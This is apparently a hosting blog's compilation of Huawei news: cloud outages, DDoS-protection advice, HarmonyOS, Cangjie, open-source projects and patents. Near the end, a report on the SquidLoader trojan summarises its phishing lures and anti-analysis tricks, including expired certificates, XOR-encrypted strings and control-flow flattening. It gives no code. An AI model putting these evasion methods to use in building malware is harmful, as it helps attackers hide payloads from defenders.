今日上午9点20分左右,华为云出现宕机,登录、管理后台无法访问,显示“系统繁忙,请稍后重试” 数据显示,截至去年年底,华为云已上线200多个云服务以及190多个解决方案,300多万企业和开发者基于华为云进行云端开发。 在之前的P40发布会上,余承东表示:“华为将继续开发芯-端-云等全场景能力,我们希望与全球开发者和合作伙伴加快建设HMS生态,共赢5G新未来,为用户创造更美好的智慧生活体验。” 据悉,华为手机都可以够通过华为云空间的云备份功能实现轻松换机,并可实现跨终端的一致体验。云备份可实现手机数据自动备份,将备份过的内容一键轻松迁移到新设备中,严格保障用户个人数据安全。 #### 华为云服务器被DDOS攻击怎么办? 最近一直有站长向主机吧反馈,自己的华为云服务器被人DDOS攻击了,想咨询主机吧要怎么防? 主机吧查了下,华为云本身是有DDOS防御的,不过免费的很小。 Anti-DDoS流量清洗 Anti-DDoS流量清洗服务为华为云内资源(弹性云服务器、弹性负载均衡),提供网络层和应用层的DDoS攻击防护(如泛洪流量型攻击防护、资源消耗型攻击防护),并提供攻击拦截实时告警,有效提升用户带宽利用率,保障业务稳定可靠。 华为云对云内资源每个实例免费提供5Gbps DDoS攻击流量清洗 ,超过5Gbps流量攻击,系统会对超过黑洞阈值的受攻击公网IP进行黑洞处理,正常访问流量会丢弃。 官方的DDOS防御价格也是相当昂贵 直接买华为云官方的DDOS防御不现实,一个月要几万块,所以主机吧建议购买第三方的防御,进行转发防御即可。 通过第三方防御要先给服务器更换一个新的IP,否则无法正常防御的,华为云支持更换IP的。 操作场景 如果您的弹性云服务器绑定了弹性公网IP,您可以参考本节操作更换弹性公网IP。 由于管理控制台暂不支持直接更换云服务器弹性公网IP。请先解绑当前的弹性公网IP后,再重新绑定新的弹性IP。 约束限制 为防止误删除操作,弹性公网IP存在24小时缓存机制,对于已释放过弹性公网IP的用户,24小时内会优先分配之前使用过的弹性公网IP。 如需申请新的弹性公网IP地址,建议您先购买新的弹性公网IP后再释放旧的弹性公网IP。 详细内容请参考弹性公网IP的分配策略。 解绑弹性公网IP 登录管理控制台。单击管理控制台左上角的,选择区域和项目。选择指定云服务器,单击“操作”列下的“更多 > 网络设置 > 解绑弹性公网IP”。确认弹性公网IP信息,解绑EIP。说明:未绑定弹性云服务器的弹性公网IP会继续计费,如果不再使用请根据控制台的引导释放弹性公网IP。 绑定新的弹性公网IP 登录管理控制台。单击管理控制台左上角的,选择区域和项目。选择指定云服务器,单击“操作”列下的“更多 > 网络设置 > 绑定弹性公网IP”。选择弹性公网IP,单击“确定”完成新的弹性公网IP的绑定。说明:如果当前区域没有可用的弹性公网IP,则弹性公网IP列表为空,请购买弹性公网IP后重新执行绑定操作。图1 绑定新的弹性公网IP 更换IP后,我们需要根据自己的业务选择合适的防御方案。 如果您是APP业务,主机吧推荐使用高防IP进行防御,主机吧高防IP可防御APP的DDOS、CC攻击,精准无误杀。 独享节点: 国内 防御峰值:80G CC防御:180000QPS 带宽峰值:50M 主域名:1个 子域名:5个 转发IP:1个 无地域访问限制国内+海外主机均可防御 支持接入网站+游戏+手机APP业务 月付:2600元 如果您是网站业务,推荐使用高防CDN进行防御,主机吧推荐使用百度云加速、京东云星盾。 百度云加速是百度旗下为网站提供一站式加速、安全防护和搜索引擎优化的产品。提供四到七层的DDoS攻击防护,包括CC、SYN flood、UDP flood等所有DDoS攻击方式, 通过分布式高性能防火墙+精准流量清洗+CC防御+WEB攻击拦截,组合过滤精确识别,有效防御各种类型攻击。相关链接 京东云星盾安全加速(SCDN,Secure Content Delivery Network),是京东云推出的一体化分布式安全防御产品,提供免费 SSL 证书,集成 Web 攻击防护、CC 攻击防御、BOT 机器人分析,并将内容分发加速能力融于一身。在边缘节点注入安全能力,形成分布式的安全加速网络,让您的业务更安全、体验更流畅。适用于所有兼顾安全和内容加速的业务。相关链接 我们只需要简单的接入就可以正常防御了,DDOS防御是一件非常简单的事情,如果您不懂的,可以联系主机吧咨询。 #### 华为云电脑停止服务了 近日,华为云电脑团队发布公告称,因业务发展策略调整,“华为云电脑”将于北京时间2021年8月15日23点59分停止服务和运营。 华为云电脑团队表示,在此之前,有效套餐仍可连接使用,请务必及时转存云电脑中的所有数据,停服后您的数据将被永久删除,不可恢复。 同时,华为云电脑团队建议,用户在2021年8月15日23点59分之前,及时使用已购买套餐,或者进行退订。若停服前未及时退订,在2021年8月15日23点59分针对订单购买时间在1年内的套餐,将统一安排自动“退订”。 以下为公告全文: 尊敬的用户: 因业务发展策略调整,“华为云电脑”将于北京时间2021年8月15日23点59分停止服务和运营,届时及以后您将无法登录和使用。在此之前,有效套餐仍可连接使用,请您务必及时转存云电脑中的所有数据,停服后您的数据将被永久删除,不可恢复。 我们建议您在2021年8月15日23点59分之前,及时使用已购买套餐,或者进行退订。若停服前未及时退订,在2021年8月15日23点59分针对订单购买时间在1年内的套餐,为您统一安排自动“退订”,具体到账时间以您原支付渠道规定为准,请您及时查询。 对此停服给您带来的不便,我们深表歉意。感谢您一直以来的陪伴和支持,任何疑问敬请通过App内在线客服进行咨询和处理。 华为云电脑团队 华为云电脑是一款可以在手机远程操控windows系统的产品,刚出来的时候确实火了一段时间,不知道是不是因为国内政策原因还是因为制裁原因,居然停运了,可惜了。 #### 华为发布定制的鸿蒙字体 可免费商用 华为正式发布了HarmonyOS 2鸿蒙操作系统,其字体设计也是全新定制的“HarmonyOS Sans”,现已公开上线,可以免费商用。     该字体来自汉仪字库字体设计团队,设计上聚焦于功能性、普适性,是一款多语言的无级可变字体,支持简体中文、繁体中文、拉丁、西里尔、希腊、阿拉伯等5大书写系统,105种语言全球化覆盖。     HarmonyOS Sans字体的三大特性:     1、易读     系统字体区别于传统平面印刷字体,在智能终端的应用场景之中,易读是最基础也是最为关键的一个条件。     中文笔画复杂,HarmonyOS Sans在设计时为应对可变字体笔画连接处易破碎的情况,做出优化统一处理,使得字体最终呈现效果干净而利落。     繁琐的笔画、不均匀的布白,都会直接影响到用户的阅读,HarmonyOS Sans针对多元的应用场景对字体的“灰度”感受进行了优化。     根据用户不同的使用场景,字体的字面率做了差别化处理。     西文字形设计,为使用户能够快速读取信息,选用纯粹而经典的几何造型,直观醒目。     大开口造型处理,字形易认,辨识度更高。     在人因研究实验中,HarmonyOS Sans与优质的字体汉仪旗黑、微软雅黑进行了对比,眼动实验显示如下:     新字体平均注视时间要低于汉仪旗黑和微软雅黑。     西文与Product Sans、Roboto进行对比,新字体平均注视时间均低于其他字体,HarmonyOS Sans中西文得易读性均得到了印证。     2、独特     华为用户针对字形风格评价显示,用户评价高频词汇为:清晰的、中性的、优雅的、自然的、好看的、舒适的。     用户对新字体的好感度高于旧字体,且感知到了字体笔画的优化,如削弱了黑体的机械感等。     中文“口”部件,现代感结构处理。     笔画造型,融入了书写美感。     在保障字体功能的前提下,相较其他系统字体,HarmonyOS Sans的独特是在人文感和现代感中找到了新的平衡。     传统几何结构通常易读性较差,为了规避此类问题,在设计西文时,减少了字形宽度比例差异。     “Italic” 的设计参考了手写字的笔画结构,向历史致敬。     3、通用     除多种书写系统的文字匹配,文字与符号、图标甚至是手机系统之间的匹配,都会直接影响到用户的体验,华为的全球化视野,以及多元复杂的应用场景,注定了HarmonyOS Sans必须具备极强的通用性。     在人因研究过程中,西文的用户体验和可读性研究反馈出一个十分有趣的现象,当用户从系统默认字体Roboto变为HarmonyOS Sans时不会觉得很跳跃,但从HarmonyOS Sans变为Roboto时,体验感明显下降。     为应对中西文匹配排版,时常不甚协调的问题,HarmonyOS Sans做出了针对性优化。从整体来看,HarmonyOS Sans比Roboto更显大更显宽,与中文匹配度更高。     HarmonyOS Sans还设计了 Italic、Condensed、Condensed Italic字体,为多元复杂的应用场景提供了更多的可能性。     为满足用户的不同的使用场景,HarmonyOS Sans对符号设定了多种与文字相匹配的排版属性。     在实际应用层面,文字与系统的匹配是不可忽视的一环,HarmonyOS Sans逐一细化用户的使用场景,并作出针对化处理。     人因研究结果显示,相同字重下,深色背景感知文字更粗。     为此,深色模式下使用了更细的字重,让字体的视觉粗细与浅色模式保持一致。     文字与图标使用统一的设计语言,也是为用户呈现多设备互助全新体验的关键要素,HarmonyOS Sans最终呈现如下:     获取HarmonyOS Sans——     汉仪字库官方网站:     http://www.hanyi.com.cn     华为HarmonyOS开发者网站:     http://developer.harmonyos.com     字由官网:     http://www.hellofont.cn #### 华为向联合国提议重构互联网:采用新的核心网络技术新标准,名为“New IP” 新架构将支持尖端技术, 华为曾表示,新技术的一些部分已经在建造中,相关部分已准备好在2021年之前进行测试。 以下为《演示文稿》: 《金融时报》消息,中国已向联合国建议对互联网的运作方式进行彻底的改变,其提议称支持诸如全息图和自动驾驶汽车之类的尖端技术。 华为与中国联通和中国电信以及工信部在联合国国际电信联盟(ITU)的会议上共同提议采用一种新的核心网络技术新标准,名为“New IP”。 以下为《标准提案》: 提案已获得了俄罗斯的支持,可能会获得沙特阿拉伯的支持。 一位不愿透露姓名的ITU英国代表说:“究其深层,如今正围绕互联网将来的面貌上演一场激烈的较量。” “眼下有两种相互竞争的愿景:一种愿景是高度崇尚自由和开放。另一种愿景是大大加强控制和监管。” 华为曾表示,在多个国家政府和公司的帮助下,新网络架构技术的一些部分已经在建造中,但不方便透露那些参与者的身份。华为还表示,相关部分准备好在2021年初之前进行测试。 华为声称:支撑全球网络的现有互联网基础设施(名为TCP/IP)“不稳定”且“效率严重低下”,到2030年无法满足数字世界的要求,包括自动驾驶汽车、无处不在的物联网和“全息感知的隐形传态”。 该提案建议ITU“从长计议”,“承担起为未来网络采用自上而下的设计这一责任”。 华为表示,开发New IP纯粹是为了满足快速发展的数字世界的技术要求,它并没有将任何一种控制机制做入到设计中。华为称,它在ITU领导的一个小组专注于未来网络技术。 华为发言人补充说:“New IP的研究和创新向全世界的科学家和工程师开放,他们可以参与进来,并为之贡献。” ITU目前由赵厚麟领导,他在2014年被工信部提名为ITU秘书长。 据专家们声称,ITU代表近200个成员国,ITU批准的标准通常被非洲、中东和亚洲的发展中国家采用。 华为和其他合作开发者计划11月份在印度举行的ITU重大电信会议上竭力使New IP这项标准被通过。 New IP有何不同? 互联网的结构是半个世纪前设计的,其运行方式类似邮政系统。 为了解决在全球范围内发送信息的问题,工程师们将消息分解为多个小数据包,这些小数据包可以在计算机之间传递,直至抵达目的地。 每个数据包都标有它要抵达的那台计算机的地址(即IP),该计算机收到数据包后,以正确的顺序重新组装数据包。 这个过程以光速进行,名为“传输控制协议”即TCP。结合识别一台台计算机的系统,就有了TCP/IP。 John Naughton在《未来简史:互联网的起源》一书中写道:“你可以说,TCP/IP之于有线世界,犹如DNA之于生物世界。” 据英国《金融时报》看到的一篇论文显示,New IP被华为称作是“更加动态的IP寻址系”。华为的工程师描述了互联网如何日益演变成几个独立的网络,比如专用通信网络和卫星传送信号的网络。 该论文称:“由于不相兼容的寻址机制,这些网络之间的互连是一大挑战。”论文补充道,新兴技术需要一种更高效的寻址系统。 New IP将提供这种寻址系统,从而使同一网络中的设备可以彼此直接通信,而不必在互联网上发送信息。 New IP方面的担忧来自运营商到时对IP地址可能拥有多大的控制权。批评人士称,新提案将要求网络具有“跟踪功能”,这种功能负责对添加到网络的新地址、另一头的人员以及在互联网上发送的信息数据包进行验证和授权。 据消息人士声称,华为在ITU做报告时还明确表示,New IP会有所谓的“关闭命令”,即网络中的中心点实际上可以切断与特定地址之间的通信。这项功能与目前的网络模型“背道而驰”,目前的网络模型充当“独立的邮递员,只是移动信箱而已。” #### 华为将发布自研鸿蒙编程语言:仓颉 10月22日 消息:在今日的华为开发者大会2021(Together)上,华为表示,将发布自研鸿蒙编程语言。 据悉,该自研编程语言或被命名为“仓颉”。 今年9月,华为副总裁、计算产品线总裁邓泰华曾表示,华为明年将推出自研的编程语言仓颉,打通鸿蒙和欧拉应用开发生态。 同时,在会上,华为还宣布,即日起上线鸿蒙HarmonyOS 3.0 首个开发者预览版,12月推出第二版开发者预览,明年第一季度开放beta。 据官方介绍,HarmonyOS3.0将为开发者预览版带来全新可视的弹性部署自动化工具,设备开发者可以根据不同硬件灵活选择操作系统所需组件,实现一次编译多端运行的生态架构体验。 数据显示,目前Harmony OS设备数量已超过1.5亿,预计年底能达到2亿,为成长最快的终端操作系统。 #### 华为小艺助手深度绑定deepseek 小艺网页版上线 可深度思考 速度贼快 华为小艺智能助手网页端也于近日完成上线,用户可通过浏览器直接搜索访问,或(点此访问)。该版本小艺智能助手支持所有设备访问使用,但需要用户登录自己的华为账号。 目前网页版小艺智能助手已适配手机、PC 布局,提供 AI 问答、AI 写作、编程助手、AI 翻译等功能。另外,其还支持 R1 深度思考(可自定义自动或强制)。 另外,主机邦发现小艺有一点对第三方网站挺好,就是在问问题的时候,小艺网页右边会展示参考的网页地址,可以增加网站一些点击率。 主机邦还发现小艺下的深度思考是没有繁忙的,响应速度贼快,这大概是华为本身就是算力提供平台不缺算力的原因吧。 #### 华为已开发自有手机电脑操作系统 北京时间 3 月 15 日早间消息,据香港《南华早报》报道,华为消费者业务CEO余承东表示,该公司已经为智能手机和电脑开发了自己的操作系统,以防美国科技巨头不再向其授权现有系统。 余承东说,该公司已经开发了一套专有系统。这也印证了去年的相关报道。知情人士表示,该公司是从 2012 年开始开发自有操作系统的。 “我们准备好了自己的操作系统。如果无法继续使用这些系统(Android),我们就准备开始B计划。”余承东说。 “华为的确有备用系统,但仅在必要情况下使用。说实话,我们并不想使用。”华为发言人周四说,“我们全力支持合作伙伴的操作系统,我们也喜欢这些系统,客户同样很喜欢。Android和Windows仍将是我们的首选。”(樵夫) #### 华为开源数据库能力 开放openGauss数据库源代码 今日,华为正式宣布开源数据库能力,开放openGauss数据库源代码,并成立openGauss开源社区,社区官网(opengauss.org)同步上线。据介绍,openGauss是一款开源关系型数据库管理系统,采用木兰宽松许可证v2 发行。openGauss内核源自PostgreSQL,深度融合华为在数据库领域多年的经验,结合企业级场景需求,持续构建竞争力特性。同时openGauss也是一个开源的数据库平台,鼓励社区贡献、合作。 #### 华为手机升级鸿蒙操作系统教程 万众期待的鸿蒙操作终于公测了,目前有很多朋友不懂怎么升级,刚好主机吧自己也是用华为手机的,成功升级鸿蒙系统,体验真的不错!目前测试没有问题。 教程如下: 1.打开手机“我的华为APP”-点击“升级尝鲜”   2.找到你的相关机型,比如我的是P40 pro,点立即尝鲜,如果没有你的机型,那说明还在内测当中,只能慢慢等待了。 3.找到你的机型,点 “报名公测” 4.拉到帖子最下方,点参加公测活动   5.一直点同意 6.下载描述文件,只有下载这个文件才可以升级鸿蒙 7.下载完成后,我们再反回手机,设置功能-系统和更新-软件功能,检查安装   升级更换系统的文件比较大,所以为了保证手机正常,一定要在网络环境好的情况下升级,而且毕竟保证手机有足够的电量。 #### 华为方舟编译器今日开源:OpenSource网站已上线 8月31日,华为方舟编译器将正式开源。据网友爆料,8月31日凌晨,华为开源平台网站(HUAWEI OpenSource)已经上线。但官方尚未正式公布源代码。 目前,该网站只有一些测试和说明文件,在“问题”页面,吸引了不少代码爱好者前来围观。从网友反馈来看,大家对方舟编译器的开源十分期待。 据了解,华为方舟编译器提供了全新的系统及应用的编译和运行机制,从动态编译变为静态编译,就是直接将高级语言直接编译成机器码,彻底消除了虚拟机动态编译的额外开销,实现了开发和运行效率的兼容并举。 根据华为实验室的测试数据,EMUI 9.1在仅仅对系统组件System Server应用了华为方舟编译器后,就带来了系统操作流畅度提升24%,系统响应性能提升44%的收益。 此外,方舟编译器编译的应用在开发阶段就已完成。只要是经过编译器编译的应用,在应用市场上上架了以后,用户下载的就是编译过的了。以新浪微博极速版为例,在应用方舟编译器之后,根据华为实验室测试数据显示,操作流畅度提升高达60%。 目前,已有超过20款华为、荣耀机型支持方舟编译器。 此次方舟编译器的开源,将吸引广大开发者加入华为生态,为鸿蒙系统打开市场做好准备。 #### 华为方舟编译器开源官网正式上线:源代码已开放下载 据华为官方消息,华为方舟编译器开源官网已经在今天正式上线(https://www.openarkcompiler.cn),目前源代码已经提供下载。 官网介绍,方舟编译器是为支持多种编程语言、多种芯片平台的联合编译、运行而设计的统一编程平台,包含编译器、工具链、运行时等关键部件。 目前,方舟编译器还在持续演进中,陆续将上述能力实现和开源。 据悉,本次方舟编译器开源的是编译器框架部分源码,包括编译器中间表示(IR)和语言编译实现,同时搭配编译器其他二进制组件,实现Java程序到aarch64汇编指令的编译过程。 开发者可以获得相关代码和文档,供参考学习、了解方舟编译器的架构和代码。 华为表示,在开源的世界里,我们与开发者们分享技术进步,共同成长,期待能够与广大开发者们同“舟”共济,为科技创新蓄力,不断推进产业开放式创新、构建开放生态。 据了解,华为方舟编译器提供了全新的系统及应用的编译和运行机制,从动态编译变为静态编译,就是直接将高级语言直接编译成机器码,彻底消除了虚拟机动态编译的额外开销,实现了开发和运行效率的兼容并举。 根据华为实验室的测试数据,EMUI 9.1在仅仅对系统组件System Server应用了华为方舟编译器后,就带来了系统操作流畅度提升24%,系统响应性能提升44%的收益。 此外,方舟编译器编译的应用在开发阶段就已完成。只要是经过编译器编译的应用,在应用市场上上架了以后,用户下载的就是编译过的了。以新浪微博极速版为例,在应用方舟编译器之后,根据华为实验室测试数据显示,操作流畅度提升高达60%。 #### 华为欧洲专利数超越三星排第一 4 月 6 日消息,据欧洲专利厅(EPO)当地时间 5 日发布《2021 专利指数》报告显示,华为去年在欧洲申请专利 3544 项,超过韩国三星排第一。 报告显示,三星(3439 项)、LG(2422 项)分列其后。2020 年三星电子向 EPO 申请专利数量为 3276 项,居首,不到一年被华为反超。LG 仍维持 2020 年的排名不变。 报告显示,去年 EPO 接到的申请专利数共计 18.86 万项,同比增 4.5%。其中,数字通信领域增势最猛,同比增 8.2%;医疗技术(8.1%)、计算机技术(7.8%)、电子机械(6.4%)等分列其后。按国家来看,美国申请专利数占比最高,为 25%;德国(14%)、日本(11%)、中国(9%)、法国(6%)、韩国(5%)等分列其后。 据了解到,2021 年,华为研发费用支出为人民币 1,427 亿元,约占全年收入的 22.4%,截至 2021 年 12 月 31 日,华为在全球共持有有效授权专利 4.5 万余族 (超 11 万件)。 #### 华为研发投入 1419 亿,超 BAT 总和 1130 亿 9月25日消息:今天2021中国企业500强榜单出炉。榜单显示,2021中国500强企业营业收入和净利润总额实现增长,资产扩张有所加快,千亿俱乐部企业增至222家,产业结构优化升级。 榜单显示,2021中国企业500强规模逆势增长,共实现营业收入89.83万亿元,比上年增长了4.43%。同期世界500强的营业收入下滑了4.81%。2021中国企业500强营业收入前十名的公司分别为,国家电网有限公司、中国石油天然气集团有限公司、中国石油化工集团有限公司、中国建筑股份有限公司、中国平安保险(集团)股份有限公司、中国工商银行股份有限公司、中国建设银行股份有限公司、中国农业银行股份有限公司、中国人寿保险(集团)公司、中国铁路工程集团有限公司。 在研发投入排名中,华为以1418.93亿元的研发投入排名第一;阿里巴巴研发投入572.36亿元,排名第二;腾讯投入389.72亿元,位列第三;百度研发投入195.13亿元。 #### 华为编程语言真的要来了?此前官方称将推出鸿蒙 HarmonyOS“仓颉” 3月17日 消息:今日,华为编程语言实验室,面向部分开发者发布了华为新语言的试用报名问卷,并表示,在问卷填写完成后,将通过邮件进行后续信息的通知。 去年9月,华为曾透露华为将推出自研的编程语言仓颉,将鸿蒙和欧拉在应用开发生态上进行打通。 据了解,华为此前申请注册“仓颉语言”商标。该商标状态为“注册申请中”,申请人名称为“华为技术有限公司”,国际分类为“42类 设计研究”。资料显示,商标第42类主要是指:科学技术服务和与之相关的研究与设计服务;工业分析与研究;计算机硬件与软件的设计与开发。 目前国内熟知的编程语言,诸如C语言/C++,Java、Python、PHP等,均为国外企业研发,比如主机吧博客就是用PHP编程语言搭建的,华为自研“仓颉”编程语言无疑可以打破这种国外垄断的现状。 #### 华为自研仓颉编程语言正式开放下载 今年 6 月 21 日的华为开发者大会(HDC)正式公开介绍了华为自研的通用编程语言:仓颉编程语言,并发布了 HarmonyOS NEXT 仓颉语言开发者预览版,开发者可以使用仓颉开发鸿蒙原生应用。 时隔四个月,依据仓颉编程语言社区建设规划,仓颉编程语言官网于今天(2024 年 10 月 30 日 10:08)正式公开上线,首个公测版本开放下载。中文官网地址:https://cangjie-lang.cn/英文官网地址:https://cangjie-lang.cn/en 本次仓颉编程语言官网上线了首页、在线体验、文档、学习、下载、动态以及三方库共六个模块。 首页主要从仓颉语言的特征、仓颉语言的应用场景、仓颉语言的成功案例、如何参与仓颉语言社区、仓颉语言的最新动态以及合作伙伴为角度,让开发者了解仓颉编程语言的发展概貌。 在线体验给开发者提供了快速体验仓颉语言的功能,开发者可以通过在线体验提供的预置代码,简单了解仓颉语言的程序结构,面向对象的开发范式、函数开发范式、多线程编程以及网络编程,快速了解仓颉编程的概貌。 文档模块主要收录并展示了《仓颉编程语言白皮书》、《仓颉编程语言语言规约》、开发指南、API、工具指南,入门指南(HarmonyOS NEXT 应用开发)共 6 篇官方标准文档,让开发者全方位了解仓颉编程语言,并方便开发者学习以及查阅。 学习模块主要收录并展示了仓颉编程语言相关的视频课程、示例代码、书籍以及技术文章,丰富开发者的学习资源和途径。 下载模块提供了仓颉编程语言的软件包及 IDE 的下载以及安装指南。仓颉编程语言提供三个版本通道(LTS、Beta 和 Dev),每个通道均提供可以在 Linux、Windows 以及 Mac 上安装使用的软件包与帮助开发者在 VScode 平台上搭建开发环境的插件。 动态模块主要收录并展示了仓颉编程语言社区最新动态,让开发者了解仓颉编程语言的相关活动和信息。 三方库模块主要展示了仓颉编程语言 TPC 仓库以及 SIG 仓库。TPC 仓库中的三方库功能基本完善并且有指定的维护者进行维护,SIG 仓库中的三方库正在孵化中。 华为官方表示,目前仓颉社区就已经收到了超 2 万名开发者的内测申请。仓颉编程语言在工商银行短信银行系统、工商银行手机银行 Harmony OS NEXT App、中移信息磐基 Paas 平台、京东 Harmony OS NEXT App、力扣 Harmony OS NEXT App、泛微公文交换系统、泛微 Emobile-10 Harmony OS NEXT App、科蓝金融交易回溯系统、科蓝 Harmony OS NEXT 身份认证组件等,10 + 商用场景获得成功实践。 此外,仓颉社区联合宝兰德、普元、金蝶天燕、东方通、享道出行等,共同公开了 100 + 三方库。仓颉社区也收到了来自交通银行、七猫、宁波银行、兴业银行、前海新思路、屹通、大汉软件、中创软件等的合作邀请,将共同探索仓颉编程语言的商用实践以及生态建设。 #### 华为自研编程语言“仓颉”火上热搜,英文名 Cangjie不是中文编程也不存在“套壳” 备受关注的华为自研编程语言「仓颉」,又火上热搜了。这次是因为「仓颉」正式开启了内测,目前已经有部分开发者拿到源代码。 前不久,华为编程语言实验室发布了一份“新语言试用报名-202203”问卷,正式征集一小批开发者对「仓颉」编程语言进行小范围测试。从问卷内容来看,开发者们需要填写 Gitee 主页、职业和公司等信息,然后等待邮件通知。 现在,随着更多细节被透露出来,之前对于「仓颉」猜测的一些传言,也有了明确的答案。 英文名 Cangjie,并非中文编程 事实上,早在去年 10 月,华为官方就明确透露过“将发布自研鸿蒙编程语言”。 对此,华为消费者业务软件部总裁龚体表示,它将“为鸿蒙生态基础设施建设补上最后一环”。 同时,华为也已经申请注册了“华为仓颉”、“仓颉语言”等商标,分类包括科学仪器、设计研究等,而部分“仓颉”商标则还在驳回复审、注册申请的阶段。 #### 华为花瓣邮箱线了啦! 经过半年测试,华为应用市场于近日上架了自家的应用花瓣邮箱”。 目前华为花瓣邮箱最新版本为1.0.0.301.beta,安装包大小16.24MB。 由于刚刚上线,用户数还很好,目前只有4人打分,但是全部给了5星满分,足可见用户对这款应用的满意。 目前了解,花瓣邮箱 App 是一款功能非常强大的华为官方邮箱应用。 官方地址https://www.petalmail.com/ 它的主要特性包括: - 花瓣邮件地址即华为帐号,一个帐号畅享华为优质服务,一键免密极速登录 - 流畅收发邮件,包括抄/密送、附件等,界面干净清爽 - 通过滑动、点按等方式快速处理邮件 - 通过加注星标、归档、删除、标记垃圾邮件等方式随心整理邮件 - 实时邮件提醒,重要邮件不错过 据悉,HMS(华为移动服务:Huawei Mobile Service)是华为替代GMS(谷歌移动服务:Google Mobile Service)生态的解决方案,以解决国内用户因特殊原因用不上GMS的问题,已成为全球第三大移动应用生态。 根据资料显示,通过HMS,用户可以使用移动电话或其他移动设备使用华为应用市场、华为地图服务、华为账号服务、数字版权服务、华为云存储、华为机器学习服务、全景技术服务、应用内支付、广告服务、推送服务、分析服务等。 截至今年5月,华为HMS在海外范围内所拥有的开发者数量已经成功突破400万,活跃用户超7亿。 #### 华为被抓小辫子:L20首席安全专家为Linux内核提交补丁被发现「漏洞」 本文转自公众号:云头条华为表示,该员工提交的代码是其个人项目的一部分,其行为并不代表公司。华为周一断然否认官方参与上周末向Linux内核项目提交不安全补丁的行为,该补丁带来了一个“轻而易举就能利用的”漏洞。周日这个有缺陷的补丁通过邮件列表提交给了官方的Linux内核项目。该补丁名为HKSP(华为内核自我保护),据称为Linux内核引入了一系列加强安全的选项。在各自的数据中心和在线服务中大量使用Linux的大型科技公司常常向Linux内核提交补丁。众所周知,谷歌、微软和亚马逊等公司都贡献了代码。HKSP中惊现轻而易举就能利用的漏洞周日,提交HKSP引发了Linux社区的普遍关注,这可能表明华为希望为官方内核做出贡献。因此,该补丁立即受到了相关人员的严格审查,其中包括Grsecurity的开发团队,该项目为Linux内核提供了自己的一系列加强安全的补丁。Grsecurity团队在同一天发表的一篇博文(完整内容:https://grsecurity.net/huawei_hksp_introduces_trivially_exploitable_vulnerability)中表示,该团队发现HKSP补丁在内核代码中引入一个“轻而易举就能利用的”漏洞——如果该补丁得到批准的话。并称,该补丁提交者身份是华为L20首席安全专家。 种种谣言和阴谋论几乎立马在网上甚嚣尘上,纷纷指责华为企图在Linux内核中偷偷引入安全漏洞。(链接:https://news.ycombinator.com/item?id=23137041)在当今错综复杂的政治环境下,这种指责既毫无新意也不令人惊讶。在过去这几年,华为多次被指控在其网络设备中植入后门;面对这些指控,华为一直矢口否认,或者试图在Twitter视频中加以解释。华为声称系员工个人行为 然而,华为在周一发表的一份声明中表示,尽管该项目在标题中使用了华为这个名字,并且该项目确实由华为的一位知名安全工程师开发,但该公司并未正式参与HKSP项目。华为表示,该项目是由这位工程师创建并提交给Linux内核项目的,并没有得到公司的官方支持,而且HKSP代码也从未实际用于华为的任何官方产品中。华为声称:“这只是员工个人与开源社区Openwall进行技术讨论所使用的演示代码而已。”周一HKSP项目也做出更新,华为的这名员工附加了一段类似的免责声明。华为员工编写的代码里面含有安全漏洞,这种事并不新鲜。英国政府去年的一份报告发现,华为网络设备充斥着许多安全漏洞,这些漏洞常常好几年都没有收到补丁。相关链接:https://www.openwall.com/lists/kernel-hardening/2020/05/10/3https://github.com/cloudsec/hksphttps://www.openwall.com/lists/kernel-hardening/2020/05/11/2https://grsecurity.net/huawei_hksp_introduces_trivially_exploitable_vulnerability #### 华为被美国禁或对华为云服务影响巨大 日前,美国商务部工业和安全局(BIS)宣布把华为列入“实体名单”,此举意味着将禁止华为在未经美国政府的批准下从美国公司购买零件。 已知的影响是华为将不能购买使用安卓系统带有授权的服务,如 Chrome、 Google 搜索、YouTube 和 Play Store 应用商城在内的 Google 核心产品,以及 Gmail、Maps、Google Photos、Drive 等在内的主要产品,这些产品在国外很流行,如果一个手机不能安装这类产品将会影响其竞争力,华为海外版手机将遭受重击。 国内很多观点认为对国内影响较小,但其实不然,主机吧要说的是华为近期大有崛起的华为云服务。 其大量使用了带有授权的美国软件硬件,比如微软的windows系统,要知道微软系统是要授权的,一但被禁止华为云服务器将没有windows系统可安装,虽然有开源的linux可用,但是对于很多面向企业的服务必须是windows系统。还有如mysql数据库也是Oracle甲骨文公司旗下的产品,而甲骨文也是美国公司的,总之美国的软件绝对占据云服务市场90%以上,一但断供,其影响是非常巨大的。 除了软件外还有硬件,华为云服务器大量采用了英特尔的处理器,要知道英特尔处理器目前在服务器市场的地位几乎无可取代,市场地位相当于微软的windows系统一样,即使差点的AMD也是美国的,虽然华为出了自己的服务器芯片:鲲鹏920处理器,但是短时间内影响还是非常巨大的。 美国政府打压华为已经不是一天的事了,只是没想到这次这么绝,华为短期内阵痛是肯定的了,希望华为这次能顶住吧,一但顶住这次危机,相信华为将一飞冲天。 #### 华为被黑惨了,名为“华为路由器产品介绍”实为钓鱼文档 6 月 25 日消息,美运营商 AT&T 旗下的安全公司 LevelBlue 近日发布报告,曝光一款名为 SquidLoader 的木马,这款木马主要波及简体中文用户,黑客将相关木马打包成各种“产品介绍”文档,对不知情的受害者进行攻击。 从报告中获悉,黑客设置一系列名为“华为工业级路由器的产品介绍及客户成功案例”、“黄河水利职业技术学院简章”等钓鱼文档,但实际上这些文档都是隐藏的可执行文件,据称如此命名主要是“吸引不知情的受害者上当”,一旦受害者打开“文档”,这些隐藏的可执行文件便会自动向黑客设置的远程服务器上的 URL 发出 Get HTTPS 请求,然后自动部署 SquidLoader 木马。 值得注意的是,这款木马据称具备高度反检测能力,为了让其看起来像正常的系统进程,黑客利用已经过期的合法证书蒙骗系统,同时文件中还混淆了大量来自微信、mingw-gcc 等应用的代码(实际无法正常执行)以防止安全公司检测,同时木马内置的部分功能函数含有 call 或 jmp 指令以指向另一个功能函数,从而导致安全公司的反编译工具出现解析错误。 此外,黑客也在代码中利用各种无意义的诱饵指令来欺骗研究人员,并通过堆栈的方式使用 XOR 密钥来加密特定字符串。此外,这些黑客也针对 Shell Code 相关的功能函数进行控制流图(Control Flow Graph,CFG)混淆处理,导致 CFG 被扁平化为带有大量 switch 字符串的无限循环,进一步防止安全公司检测。 据此,安全公司警告用户应当谨慎下载任何文档文件,以防止设备中关键内容外泄,安全公司同时警告,由于此类攻击技术 / 手法易于复制,未来很有可能被其他黑客开发者效仿。 #### 华为要打造根技术:自研编程语言仓颉今年下半年发布 近日:在华为伙伴暨开发者大会2022上,华为公司副总裁、计算产品线总裁邓泰华发表「共建计算产业,共创数智未来」主题演讲,分享鲲鹏、昇腾、欧拉在商业、生态、技术方面的最新进展。 